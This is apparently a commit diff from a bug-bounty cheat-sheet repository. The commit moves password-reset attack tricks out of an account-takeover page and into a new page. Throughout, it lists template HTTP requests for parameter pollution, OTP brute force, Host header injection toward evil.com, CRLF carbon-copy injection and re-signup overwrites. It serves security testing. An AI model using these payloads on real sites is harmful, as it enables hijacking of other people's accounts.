ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2024-12-18 18:36:12 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Daffa / Split reset password and ATO

Browse Source
This commit is contained in:
MD15 2021-01-31 22:03:29 +07:00
parent a665b452be
commit 410420e645
2 changed files with 95 additions and 94 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

101
Account Takeover.md
View File

@ -1,79 +1,12 @@
## Account Takeover ## Account Takeover
1. Parameter pollution in reset password 1. Using OAuth Misconfiguration
``` - Victim has a account in evil.com
POST /reset - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email
[...] - Attacker changed his/her email to victim email.
email=victim@mail.com&email=hacker@mail.com - When the victim try to create an account on evil.com, it says the email already exists.
```
2. Bruteforce the OTP code 2. Try re-sign up using same email
```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```
```
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset
[...]
email=victim
```
6. No TLD in value of the parameter
```
POST /reset
[...]
email=victim@mail
```
7. Using carbon copy
```
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
8. Try re-sign up using same email
``` ```
POST /newaccount POST /newaccount
[...] [...]
@ -84,24 +17,4 @@ After sign up using victim email, try signup again but using different password
POST /newaccount POST /newaccount
[...] [...]
email=victim@mail.com&password=hacked email=victim@mail.com&password=hacked
``` ```
9. If there is JSON data in body requests, add comma
```
POST /newaccount
[...]
{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
```
10. Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359)
11. Account takeover after login (Work if inside the website there is "Connect to facebook/twitter/etc")
- First, login to the website using victim email
- Find "Connect to facebook/twitter/googleplus" or something like that ![Photo](https://miro.medium.com/max/875/0*LOrCFhQF9-KPALPg.png)]
- Connect to attacker twitter
- After logout you can login using the twitter

88
Password Reset Flaws.md Normal file
View File

@ -0,0 +1,88 @@
## Password Reset Flaws
1. Parameter pollution in reset password
```
POST /reset
[...]
email=victim@mail.com&email=hacker@mail.com
```
2. Bruteforce the OTP code
```
POST /reset
[...]
email=victim@mail.com&code=$123456$
```
3. Host header Injection
```
POST /reset
Host: evil.com
[...]
email=victim@mail.com
```
```
POST /reset
Host: target.com
X-Forwarded-Host: evil.com
[...]
email=victim@mail.com
```
And the victim will receive the reset link with evil.com
4. Using separator in value of the parameter
```
POST /reset
[...]
email=victim@mail.com,hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%20hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com|hacker@mail.com
```
```
POST /reset
[...]
email=victim@mail.com%00hacker@mail.com
```
5. No domain in value of the paramter
```
POST /reset
[...]
email=victim
```
6. No TLD in value of the parameter
```
POST /reset
[...]
email=victim@mail
```
7. Using carbon copy
```
POST /reset
[...]
email=victim@mail.com%0a%0dcc:hacker@mail.com
```
8. If there is JSON data in body requests, add comma
```
POST /newaccount
[...]
{“email”:“victim@mail.com”,”hacker@mail.com”,“token”:”xxxxxxxxxx”}
```
9. Find out how the tokens generate
- Generated based on TimeStamp
- Generated based on the ID of the user
- Generated based on the email of the user
- Generated based on the name of the user
> [For Example](https://medium.com/bugbountywriteup/how-i-discovered-an-interesting-account-takeover-flaw-18a7fb1e5359)